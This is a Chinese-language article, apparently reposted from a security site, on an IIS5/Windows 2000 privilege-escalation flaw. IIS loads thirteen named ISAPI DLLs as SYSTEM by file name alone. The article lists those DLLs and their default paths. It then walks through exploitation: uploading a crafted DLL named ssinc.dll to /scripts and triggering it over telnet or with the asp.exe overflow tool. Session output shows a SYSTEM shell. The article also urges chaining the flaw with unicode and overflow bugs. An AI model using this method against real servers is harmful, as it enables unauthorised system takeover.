IIS提升权限漏洞

IIS4默认情况下，应用程序保护选项是"低（共用IIS进程）"，所以加载isapi的时候是以加载IIS的身份执行。但WIN2K+IIS5.0默认情况下应用程序保护选项是"中（共用的）"，这时IIS加载isapi是用的iwam_computername用户身份执行。

但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5 、win2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名，并且没有做目录限制，以SYSTEM权限加载的isapi有：

1、 idq.dll

2、 httpext.dll

3、 httpodbc.dll

4、 ssinc.dll

5、 msw3prt.dll

6、 author.dll

7、 admin.dll

8、 shtml.dll

9、 sspifilt.dll

10、compfilt.dll

11、pwsdata.dll

12、md5filt.dll

13、fpexedll.dll

所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug，比如请求/scripts/test%81%5cssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双字节的远东版问题。ssinc.dll在处理包含文件路径的时候也有一个问题，就是"/"、""只识别了一个"/"，所以如果请求里面使用""，就会错误的处理包含文件路径，有可能泄露东西或者出现权限漏洞，这种漏洞很多别的地方（ php、asp等）也还存在。

但在补了http://www.microsoft.com/technet/security/bulletin/ms01-026.asp 补丁(%25二次解码补丁包，包含在sp3)后，加载这些isapi不是单以文件名做依据了，而是加了路径，应该是修正了此问题。

一般默认情况下是：

1、 idq.dll d:winntsystem32idq.dll

2、 httpext.dll d:winntsystem32inetsrvhttpext.dll

3、 httpodbc.dll d:winntsystem32inetsrvhttpodbc.dll

4、 ssinc.dll d:winntsystem32inrtsrvssinc.dll

5、 msw3prt.dll d:winntsystem32msw3prt.dll

6、 author.dll D:Program FilesCommon FilesMicrosoft Sharedweb server extensions40isapi\_vti_autauthor.dll

7、 admin.dll D:Program FilesCommon FilesMicrosoft Sharedweb server extensions40isapi\_vti_admadmin.dll

8、 shtml.dll D:Program FilesCommon FilesMicrosoft Sharedweb server extensions40isapishtml.dll

9、 sspifilt.dll d:winntsystem32inetsrvsspifilt.dll

10、compfilt.dll d:winntsystem32inetsrvcompfilt.dll

11、pwsdata.dll d:winntsystem32inetsrvpwsdata.dll

12、md5filt.dll d:winntsystem32inetsrvmd5filt.dll

13、fpexedll.dll D:Program FilesCommon FilesMicrosoft Sharedweb server extensions40infpexedll.dll

正常情况下这些路径都guest不能写,所以应该算已经补上。但如果配置不好，这些路径guest能够写了就一样可以提升权限了

win2000的getadmin

把此dll上传到IIS的可执行目录，文件名可叫ssinc.dll或者admin.dll等（上面列的13个文件名之一）。然后使用telnet或者原来的asp.exe。

1、使用telnet。因为这不是专门的客户端，使用参数"?okok"让通信不加密，如果不带这参数将是乱码。

D:WINNTemptelnet 192.168.8.48 80

get /scripts/ssinc.dll?okok

XORDATAMicrosoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-2000 Microsoft Corp.

D:WINNTsystem32whoami

whoami

NT AUTHORITYSYSTEM

D:WINNTsystem32

2、使用asp.exe。同样支持iisput、iisget、iiscmd等命令。

E:workaspDebugasp 192.168.8.48 /scripts/ssinc.dll

IIS4.0 OVERFLOW PROGRAM 2.0 .

copy by yuange 2000.6.2.

welcome to my homepagehttp://yuange.yeah.net .

welcome tohttp://www.nsfocus.com .

usage: asp [aspfile] [webport] [offset]

nuke ip: 192.168.8.48 port 80

offset:0

shellcode long 0x143c

packetlong:0x1003c

send packet 65634 bytes.

recv:

TRACK / HTTP/1.1

HOST:192.168.8.48

ok!recv 8 bytes

recv:XORDATAMicrosoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-2000 Microsoft Corp.

D:WINNTsystem32whoami

whoami

NT AUTHORITYSYSTEM

对于IIS4默认情况下加载ISAPI的DLL都是SYSTEM权限，要得到SYSTEM权限那就根本不是问题。但IIS5默认不是，就需要利用这个提升权限漏洞。这个漏洞照现在公布的，需要有个可写目录供上传利用的dll，因为UNICODE漏洞所以不一定要在虚拟目录，不过默认情况下虚拟可执行目录/scripts可写。

其实结合别的漏洞，根本不需要可写目录，不需要上传DLL,可以利用IIS自身带的一些DLL，利用UNICODE、利用溢出，利用再一个漏洞、加上这个提升权限的漏洞，那就可以一步到位，直接得到system权限。

WINDOWS、IIS等漏洞太多，现在利用IIS漏洞都是玩组合了。像上面说的实际应用中就可以一下利用我们发现的unicode、fpse扩展溢出、截断、提升权限漏洞4个大漏洞。

• ·IIS5.0示例脚本文件CodeBrws.as
• ·中文Win2k漏洞修补三法
• ·Windows9x共享密码校验有漏洞
• ·NT和2000的登陆漏洞及堵洞方法
• ·康熙来料：笑嗷江湖|报价￥6.00|图书,动漫
• ·Windows系统常见漏洞分析
• ·杜绝IPC$漏洞
• ·WINDOWS最危险的十个漏洞!
• ·缝缝补补堵漏洞
• ·汉语轻松阅读——中国古今笑话（汉德）|报价￥2